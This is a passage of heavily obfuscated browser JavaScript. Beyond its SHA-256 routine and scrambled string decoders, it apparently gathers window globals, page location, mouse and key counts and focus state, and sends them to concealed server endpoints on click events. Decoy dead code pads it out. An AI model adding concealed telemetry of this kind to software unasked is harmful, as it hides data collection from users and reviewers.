lwkZPmj=g3Gld7J.charCodeAt(Umd97Q)<<FZHYVb[0x12]|(Umd97Q+FZHYVb[0x1]<FUaXU5?g3Gld7J.charCodeAt(Umd97Q+FZHYVb[0x1])<<FZHYVb[0x2]:FZHYVb[0x0])|(Umd97Q+FZHYVb[0x16]<FUaXU5?g3Gld7J.charCodeAt(Umd97Q+FZHYVb[0x16]):FZHYVb[0x0]),HwsNDHD;for(HwsNDHD=FZHYVb[0x0];HwsNDHD<FZHYVb[0x17];HwsNDHD++)Umd97Q*FZHYVb[0x2]+HwsNDHD*FZHYVb[0x7]>g3Gld7J.length*FZHYVb[0x2]?R_2lkdW+=_PoKZj:R_2lkdW+=j2tRUWQ.charAt(lwkZPmj>>>FZHYVb[0x7]*(FZHYVb[0x15]-HwsNDHD)&FZHYVb[0x6])}return R_2lkdW}function xEv0OAf(g3Gld7J,_PoKZj){var j2tRUWQ=_PoKZj.length,R_2lkdW,FUaXU5,Umd97Q,dNiP0ow;R_2lkdW=Array();var ypO47D,lwkZPmj,HwsNDHD,s7MFvm;FUaXU5=Array(Math.ceil(g3Gld7J.length/FZHYVb[0x16]));for(ypO47D=FZHYVb[0x0];ypO47D<FUaXU5.length;ypO47D++)FUaXU5[ypO47D]=g3Gld7J.charCodeAt(ypO47D*FZHYVb[0x16])<<FZHYVb[0x2]|g3Gld7J.charCodeAt(ypO47D*FZHYVb[0x16]+FZHYVb[0x1]);while(FUaXU5.length>FZHYVb[0x0]){N4W9hYK(s7MFvm=Array(),HwsNDHD=FZHYVb[0x0]);for(ypO47D=FZHYVb[0x0];ypO47D<FUaXU5.length;ypO47D++){N4W9hYK(HwsNDHD=(HwsNDHD<<FZHYVb[0x12])+FUaXU5[ypO47D],lwkZPmj=Math.floor(HwsNDHD/j2tRUWQ),HwsNDHD-=lwkZPmj*j2tRUWQ);if(s7MFvm.length>FZHYVb[0x0]||lwkZPmj>FZHYVb[0x0])s7MFvm[s7MFvm.length]=lwkZPmj}N4W9hYK(R_2lkdW[R_2lkdW.length]=HwsNDHD,FUaXU5=s7MFvm)}Umd97Q="";for(ypO47D=R_2lkdW.length-FZHYVb[0x1];ypO47D>=FZHYVb[0x0];ypO47D--)Umd97Q+=_PoKZj.charAt(R_2lkdW[ypO47D]);dNiP0ow=Math.ceil(g3Gld7J.length*FZHYVb[0x2]/(Math.log(_PoKZj.length)/Math.log(FZHYVb[0x16])));for(ypO47D=Umd97Q.length;ypO47D<dNiP0ow;ypO47D++)Umd97Q=_PoKZj[FZHYVb[0x0]]+Umd97Q;return Umd97Q}function ZXXPKzm(g3Gld7J){var _PoKZj="",j2tRUWQ;j2tRUWQ=-FZHYVb[0x1];var R_2lkdW,FUaXU5;while(++j2tRUWQ<g3Gld7J.length){N4W9hYK(R_2lkdW=g3Gld7J.charCodeAt(j2tRUWQ),FUaXU5=j2tRUWQ+FZHYVb[0x1]<g3Gld7J.length?g3Gld7J.charCodeAt(j2tRUWQ+FZHYVb[0x1]):FZHYVb[0x0]);if(0xd800<=R_2lkdW&&R_2lkdW<=0xdbff&&0xdc00<=FUaXU5&&FUaXU5<=0xdfff){N4W9hYK(R_2lkdW=0x10000+((R_2lkdW&FZHYVb[0x18])<<FZHYVb[0x20])+(FUaXU5&FZHYVb[0x18]),j2tRUWQ++)}if(R_2lkdW<=FZHYVb[0x19])_PoKZj+=String.fromCharCode(R_2lkdW);else if(R_2lkdW<=0x7ff)_PoKZj+=String.fromCharCode(0xc0|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x1a],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6]);else if(R_2lkdW<=FZHYVb[0x23])_PoKZj+=String.fromCharCode(0xe0|R_2lkdW>>>FZHYVb[0xa]&FZHYVb[0x14],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6]);else if(R_2lkdW<=0x1fffff)_PoKZj+=String.fromCharCode(0xf0|R_2lkdW>>>FZHYVb[0x1c]&FZHYVb[0x9],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0xa]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6])}return _PoKZj}function _50gmY(g3Gld7J){var _PoKZj=Array(g3Gld7J.length>>FZHYVb[0x16]),j2tRUWQ,j2tRUWQ;for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<_PoKZj.length;j2tRUWQ++)_PoKZj[j2tRUWQ]=FZHYVb[0x0];for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<g3Gld7J.length*FZHYVb[0x2];j2tRUWQ+=FZHYVb[0x2])_PoKZj[j2tRUWQ>>FZHYVb[0x1e]]|=(g3Gld7J.charCodeAt(j2tRUWQ/FZHYVb[0x2])&FZHYVb[0x3])<<FZHYVb[0x1f]-j2tRUWQ%FZHYVb[0x1d];return _PoKZj}function nRl9NM(g3Gld7J){var _PoKZj="",j2tRUWQ;for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<g3Gld7J.length*FZHYVb[0x1d];j2tRUWQ+=FZHYVb[0x2])_PoKZj+=String.fromCharCode(g3Gld7J[j2tRUWQ>>FZHYVb[0x1e]]>>>FZHYVb[0x1f]-j2tRUWQ%FZHYVb[0x1d]&FZHYVb[0x3]);return _PoKZj}function KZmjaK(g3Gld7J,_PoKZj){return g3Gld7J>>>_PoKZj|g3Gld7J<<FZHYVb[0x1d]-_PoKZj}function vbVLHv(g3Gld7J,_PoKZj){return g3Gld7J>>>_PoKZj}function IiiwLR1(g3Gld7J,_PoKZj,j2tRUWQ){return g3Gld7J&_PoKZj^~g3Gld7J&j2tRUWQ}function sm3mfM(g3Gld7J,_PoKZj,j2tRUWQ){return g3Gld7J&_PoKZj^g3Gld7J&j2tRUWQ^_PoKZj&j2tRUWQ}function KmzQ7gP(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x16])^KZmjaK(g3Gld7J,FZHYVb[0xf])^KZmjaK(g3Gld7J,0x16)}function DwugHFS(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x7])^KZmjaK(g3Gld7J,0xb)^KZmjaK(g3Gld7J,0x19)}function eTp757M(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x9])^KZmjaK(g3Gld7J,FZHYVb[0x1c])^vbVLHv(g3Gld7J,FZHYVb[0x15])}function v8fEFC(g3Gld7J){return KZmjaK(g3Gld7J,0x11)^KZmjaK(g3Gld7J,FZHYVb[0x21])^vbVLHv(g3Gld7J,FZHYVb[0x20])}j2tRUWQ=new Array(0x428a2f98,0x71374491,-0x4a3f0431,-0x164a245b,0x3956c25b,0x59f111f1,-0x6dc07d5c,-0x54e3a12b,-0x27f85568,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,-0x7f214e02,-0x6423f959,-0x3e640e8c,-0x1b64963f,-0x1041b87a,0xfc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,-0x67c1aeae,-0x57ce3993,-0x4ffcd838,-0x40a68039,-0x391ff40d,-0x2a586eb9,0x6ca6351,0x14292967,0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,-0x7e3d36d2,-0x6d8dd37b,-0x5d40175f,-0x57e599b5,-0x3db47490,-0x3893ae5d,-0x2e6d17e7,-0x2966f9dc,-0xbf1ca7b,0x106aa070,0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,0x748f82ee,0x78a5636f,-0x7b3787ec,-0x7338fdf8,-0x6f410006,-0x5baf9315,-0x41065c09,-0x398e870e);function Rbmywh9(g3Gld7J,_PoKZj){var R_2lkdW=new Array(0x6a09e667,-0x4498517b,0x3c6ef372,-0x5ab00ac6,0x510e527f,-0x64fa9774,0x1f83d9ab,0x5be0cd19),FUaXU5;FUaXU5=new Array(FZHYVb[0x22]);var Umd97Q,dNiP0ow,ypO47D,lwkZPmj,HwsNDHD,s7MFvm,xEv0OAf,ZXXPKzm,_50gmY,nRl9NM,KZmjaK,vbVLHv;N4W9hYK(g3Gld7J[_PoKZj>>FZHYVb[0x1e]]|=FZHYVb[0x1b]<<FZHYVb[0x1f]-_PoKZj%FZHYVb[0x1d],g3Gld7J[(_PoKZj+FZHYVb[0x22]>>0x9<<FZHYVb[0x17])+FZHYVb[0x14]]=_PoKZj);for(_50gmY=FZHYVb[0x0];_50gmY<g3Gld7J.length;_50gmY+=FZHYVb[0x12]){N4W9hYK(Umd97Q=R_2lkdW[FZHYVb[0x0]],dNiP0ow=R_2lkdW[FZHYVb[0x1]],ypO47D=R_2lkdW[FZHYVb[0x16]],lwkZPmj=R_2lkdW[FZHYVb[0x15]],HwsNDHD=R_2lkdW[FZHYVb[0x17]],s7MFvm=R_2lkdW[FZHYVb[0x1e]],xEv0OAf=R_2lkdW[FZHYVb[0x7]],ZXXPKzm=R_2lkdW[FZHYVb[0x9]]);for(nRl9NM=FZHYVb[0x0];nRl9NM<FZHYVb[0x22];nRl9NM++){N4W9hYK(nRl9NM<FZHYVb[0x12]?FUaXU5[nRl9NM]=g3Gld7J[nRl9NM+_50gmY]:FUaXU5[nRl9NM]=J47H_Bw(J47H_Bw(J47H_Bw(v8fEFC(FUaXU5[nRl9NM-FZHYVb[0x16]]),FUaXU5[nRl9NM-FZHYVb[0x9]]),eTp757M(FUaXU5[nRl9NM-FZHYVb[0x14]])),FUaXU5[nRl9NM-FZHYVb[0x12]]),KZmjaK=J47H_Bw(J47H_Bw(J47H_Bw(J47H_Bw(ZXXPKzm,DwugHFS(HwsNDHD)),IiiwLR1(HwsNDHD,s7MFvm,xEv0OAf)),j2tRUWQ[nRl9NM]),FUaXU5[nRl9NM]),vbVLHv=J47H_Bw(KmzQ7gP(Umd97Q),sm3mfM(Umd97Q,dNiP0ow,ypO47D)),ZXXPKzm=xEv0OAf,xEv0OAf=s7MFvm,s7MFvm=HwsNDHD,HwsNDHD=J47H_Bw(lwkZPmj,KZmjaK),lwkZPmj=ypO47D,ypO47D=dNiP0ow,dNiP0ow=Umd97Q,Umd97Q=J47H_Bw(KZmjaK,vbVLHv))}N4W9hYK(R_2lkdW[FZHYVb[0x0]]=J47H_Bw(Umd97Q,R_2lkdW[FZHYVb[0x0]]),R_2lkdW[FZHYVb[0x1]]=J47H_Bw(dNiP0ow,R_2lkdW[FZHYVb[0x1]]),R_2lkdW[FZHYVb[0x16]]=J47H_Bw(ypO47D,R_2lkdW[FZHYVb[0x16]]),R_2lkdW[FZHYVb[0x15]]=J47H_Bw(lwkZPmj,R_2lkdW[FZHYVb[0x15]]),R_2lkdW[FZHYVb[0x17]]=J47H_Bw(HwsNDHD,R_2lkdW[FZHYVb[0x17]]),R_2lkdW[FZHYVb[0x1e]]=J47H_Bw(s7MFvm,R_2lkdW[FZHYVb[0x1e]]),R_2lkdW[FZHYVb[0x7]]=J47H_Bw(xEv0OAf,R_2lkdW[FZHYVb[0x7]]),R_2lkdW[FZHYVb[0x9]]=J47H_Bw(ZXXPKzm,R_2lkdW[FZHYVb[0x9]]))}return R_2lkdW}function J47H_Bw(g3Gld7J,_PoKZj){var j2tRUWQ=(g3Gld7J&FZHYVb[0x23])+(_PoKZj&FZHYVb[0x23]),R_2lkdW;R_2lkdW=(g3Gld7J>>FZHYVb[0x12])+(_PoKZj>>FZHYVb[0x12])+(j2tRUWQ>>FZHYVb[0x12]);return R_2lkdW<<FZHYVb[0x12]|j2tRUWQ&FZHYVb[0x23]}return{hex:R_2lkdW,b64:Umd97Q,any:dNiP0ow,hex_hmac:FUaXU5,b64_hmac:Umd97Q,any_hmac:dNiP0ow}}();console.log(g3Gld7J)}N4W9hYK(ypO47D=cUL0VT(),io4LB2P(_PoKZj(0x75),{[_PoKZj(0x76)]:Umd97Q,u:window[_PoKZj(0x77)][_PoKZj(0x78)],[_PoKZj(0x79)]:Object[_PoKZj(0x7a)](window)[_PoKZj(0x7b)](g3Gld7J=>{function j2tRUWQ(g3Gld7J){var j2tRUWQ="c<4qPL\"0VgNYun&kD!C,RMy%=pJG+:_IQ~1;#lrb9[vs({/maS67.U2W`fFO^35}w]|>X$HExBKz?@i8*h)AjZodetT",MSUxhJ2,_PoKZj,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),_PoKZj=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<_PoKZj;eS9fQMb++){var Umd97Q=j2tRUWQ.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function MSUxhJ2(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=j2tRUWQ(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return g3Gld7J[FZHYVb[0x0]]===g3Gld7J[FZHYVb[0x0]][_PoKZj(0x7c)]()&&!g3Gld7J[MSUxhJ2(0x7d)]("on")})})[_PoKZj(0x7e)](g3Gld7J=>{const j2tRUWQ=JSON[_PoKZj(FZHYVb[0x19])](g3Gld7J);N4W9hYK(z12fX0=cUL0VT(),FUaXU5=j2tRUWQ[_PoKZj(FZHYVb[0x1b])],j2tRUWQ[FZHYVb[0x24]]&&WuMNj_9(j2tRUWQ[FZHYVb[0x24]]))})[_PoKZj(0x81)](()=>{return FZHYVb[0x0]}))},0x1f4);let C1tndH=!FZHYVb[0x1],lwkZPmj=FZHYVb[0x0],HwsNDHD=FZHYVb[0x0];N4W9hYK(document[_PoKZj(FZHYVb[0x25])](_PoKZj(0x83),g3Gld7J=>{return g3Gld7J[_PoKZj(0x84)]&&lwkZPmj++}),document[_PoKZj(FZHYVb[0x25])](_PoKZj(0x85),g3Gld7J=>{function _PoKZj(g3Gld7J){var _PoKZj="MDkWPsZxhR*n!{lb&XKQ4)}tA;J`H@?:UVY.5fc3,(dp%IjwFE=>r08NiBSGev|TL2]mgCu1O#q/o~_<\"+[za$9^6y7",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function MSUxhJ2(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=_PoKZj(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return g3Gld7J[MSUxhJ2(0x86)]&&HwsNDHD++}),window[_PoKZj(0x87)]={["cl"](g3Gld7J,_PoKZj,MSUxhJ2){function j2tRUWQ(g3Gld7J){var _PoKZj="&ahkiHERUSKjYLgc/^D!lGu#txr@z\",[5JV3qP9>1om8_F?|=.{~INpOWQsd0nZ+;27T6vCywb$f)}<4*]X(%BMA`e:",j2tRUWQ,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5,eS9fQMb,Umd97Q;N4W9hYK(j2tRUWQ=""+(g3Gld7J||""),R_2lkdW=j2tRUWQ.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],FUaXU5=FZHYVb[0x0],eS9fQMb=-FZHYVb[0x1]);for(Umd97Q=FZHYVb[0x0];Umd97Q<R_2lkdW;Umd97Q++){var RpmYYq=_PoKZj.indexOf(j2tRUWQ[Umd97Q]);if(RpmYYq===-FZHYVb[0x1])continue;if(eS9fQMb<FZHYVb[0x0]){eS9fQMb=RpmYYq}else{N4W9hYK(eS9fQMb+=RpmYYq*FZHYVb[0xc],nco7OV|=eS9fQMb<<FUaXU5,FUaXU5+=(eS9fQMb&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],FUaXU5-=FZHYVb[0x2])}while(FUaXU5>FZHYVb[0x9]);eS9fQMb=-FZHYVb[0x1]}}if(eS9fQMb>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|eS9fQMb<<FUaXU5)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function R_2lkdW(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=j2tRUWQ(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}document[R_2lkdW(0x88)](g3Gld7J)?.addEventListener(R_2lkdW(0x89),()=>{if(C1tndH){function g3Gld7J(g3Gld7J){var j2tRUWQ="W#8w_%/Ku4E&=?{pVFQJa}:6g\"DOG0kLx.o)U[<hj$2(ClR~B5S]XcI+ey`H7>|M;rsbAz*31vNf,PtTYimnZd@^9q!",eS9fQMb,RpmYYq,_PoKZj,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5;N4W9hYK(eS9fQMb=""+(g3Gld7J||""),RpmYYq=eS9fQMb.length,_PoKZj=[],R_2lkdW=FZHYVb[0x0],Q4sOnFn=FZHYVb[0x0],nco7OV=-FZHYVb[0x1]);for(FUaXU5=FZHYVb[0x0];FUaXU5<RpmYYq;FUaXU5++){var Umd97Q=j2tRUWQ.indexOf(eS9fQMb[FUaXU5]);if(Umd97Q===-FZHYVb[0x1])continue;if(nco7OV<FZHYVb[0x0]){nco7OV=Umd97Q}else{N4W9hYK(nco7OV+=Umd97Q*FZHYVb[0xc],R_2lkdW|=nco7OV<<Q4sOnFn,Q4sOnFn+=(nco7OV&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(_PoKZj.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],Q4sOnFn-=FZHYVb[0x2])}while(Q4sOnFn>FZHYVb[0x9]);nco7OV=-FZHYVb[0x1]}}if(nco7OV>-FZHYVb[0x1]){_PoKZj.push((R_2lkdW|nco7OV<<Q4sOnFn)&FZHYVb[0x3])}return t24J32(_PoKZj)}function j2tRUWQ(j2tRUWQ){if(typeof rxdmS4[j2tRUWQ]===FZHYVb[0x5]){return rxdmS4[j2tRUWQ]=g3Gld7J(FlCAu25[j2tRUWQ])}return rxdmS4[j2tRUWQ]}if(j2tRUWQ(0x8a)in xEv0OAf){eS9fQMb()}function eS9fQMb(){}return}C1tndH=!FZHYVb[0x0];const RpmYYq=cUL0VT();N4W9hYK(Q4sOnFn[R_2lkdW(0x8b)](nco7OV,RpmYYq+ZkiMN6J*FZHYVb[0x15]+""),setTimeout(()=>{function g3Gld7J(g3Gld7J){var j2tRUWQ="BgJTpWQAlCa0:F_8If{~zH64=P#<e*`bm>R)dDXGq3/ZSM5K@j[r,(Uu!.?n7sxEN$|9v^kYhiLV&Ot1o2+%\"yw;}]c",eS9fQMb,RpmYYq,_PoKZj,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5;N4W9hYK(eS9fQMb=""+(g3Gld7J||""),RpmYYq=eS9fQMb.length,_PoKZj=[],R_2lkdW=FZHYVb[0x0],Q4sOnFn=FZHYVb[0x0],nco7OV=-FZHYVb[0x1]);for(FUaXU5=FZHYVb[0x0];FUaXU5<RpmYYq;FUaXU5++){var Umd97Q=j2tRUWQ.indexOf(eS9fQMb[FUaXU5]);if(Umd97Q===-FZHYVb[0x1])continue;if(nco7OV<FZHYVb[0x0]){nco7OV=Umd97Q}else{N4W9hYK(nco7OV+=Umd97Q*FZHYVb[0xc],R_2lkdW|=nco7OV<<Q4sOnFn,Q4sOnFn+=(nco7OV&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(_PoKZj.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],Q4sOnFn-=FZHYVb[0x2])}while(Q4sOnFn>FZHYVb[0x9]);nco7OV=-FZHYVb[0x1]}}if(nco7OV>-FZHYVb[0x1]){_PoKZj.push((R_2lkdW|nco7OV<<Q4sOnFn)&FZHYVb[0x3])}return t24J32(_PoKZj)}function j2tRUWQ(j2tRUWQ){if(typeof rxdmS4[j2tRUWQ]===FZHYVb[0x5]){return rxdmS4[j2tRUWQ]=g3Gld7J(FlCAu25[j2tRUWQ])}return rxdmS4[j2tRUWQ]}return io4LB2P(R_2lkdW(0x8c),{[R_2lkdW(0x8d)]:FUaXU5,[j2tRUWQ(0x8e)]:Umd97Q,[j2tRUWQ(0x8f)]:z12fX0-ypO47D,mm:lwkZPmj,dc:HwsNDHD,fk:_PoKZj,[j2tRUWQ(0x90)]:!document[j2tRUWQ(0x91)]&&document[j2tRUWQ(0x92)](),ms:RpmYYq-z12fX0})[j2tRUWQ(0x93)](g3Gld7J=>{return g3Gld7J&&setTimeout(()=>{return WuMNj_9(g3Gld7J)},MSUxhJ2?MSUxhJ2-(cUL0VT()-RpmYYq):FZHYVb[0x0])})[j2tRUWQ(0x94)](()=>{return FZHYVb[0x0]})},FZHYVb[0x20]))})},ch:()=>{function g3Gld7J(g3Gld7J){var _PoKZj="<VEArB@_XFT\"s?]ok[u(>n}*vH,wC`8{xyZLd6J|.+Pj1U5m:tQcR0IM)a$bp723D^4;if9gW=N&GSK~hOY%ze!#/ql",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}return io4LB2P(_PoKZj(0x95),{[_PoKZj(0x96)]:FUaXU5,[_PoKZj(0x97)]:Umd97Q})[_PoKZj(0x98)](g3Gld7J=>{return Number(g3Gld7J)===FZHYVb[0x1]})},bl:()=>{function g3Gld7J(g3Gld7J){var _PoKZj="e9dkCH|]UEmqL6x+=g_,nNPQbIKG<iB/pD@0VWoMh^>cS)Tr&[A4ZROYFsw3J7f\"Xj:.#l5ayv(!}$`u{%1;*2?~8zt",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}if(_PoKZj(0x99)in xEv0OAf){MSUxhJ2()}function MSUxhJ2(){function g3Gld7J(g3Gld7J){var _PoKZj="`AKIOT7pBc0Jl#_d3s~,%4i5Hb1uQZSw)M8]@za2FV?$vLgWXmof<h+}jUCr:[&PyG!.t9{6*/D>Nex^(=Ekn\"|;RqY",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}function MSUxhJ2(g3Gld7J){const _PoKZj={};for(let MSUxhJ2 of g3Gld7J.replace(/[^w]/g,"").toLowerCase())_PoKZj[MSUxhJ2]=_PoKZj[MSUxhJ2]+FZHYVb[0x1]||FZHYVb[0x1];return _PoKZj}function j2tRUWQ(g3Gld7J,_PoKZj){const MSUxhJ2=buildCharMap(g3Gld7J),j2tRUWQ=buildCharMap(_PoKZj);for(let Q4sOnFn in MSUxhJ2)if(MSUxhJ2[Q4sOnFn]!==j2tRUWQ[Q4sOnFn]){return FZHYVb[0x26]}if(Object.keys(MSUxhJ2).length!==Object.keys(j2tRUWQ).length){return FZHYVb[0x26]}return!0x0}function Q4sOnFn(g3Gld7J){const _PoKZj=nco7OV(g3Gld7J);return _PoKZj!==0x1/0x0}function nco7OV(g3Gld7J){if(!g3Gld7J){return-FZHYVb[0x1]}const _PoKZj=nco7OV(g3Gld7J.left),MSUxhJ2=nco7OV(g3Gld7J.right),j2tRUWQ=Math.abs(_PoKZj-MSUxhJ2);if(_PoKZj===0x1/0x0||MSUxhJ2===0x1/0x0||j2tRUWQ>FZHYVb[0x1]){return 0x1/0x0}const Q4sOnFn=Math.max(_PoKZj,MSUxhJ2)+FZHYVb[0x1];return 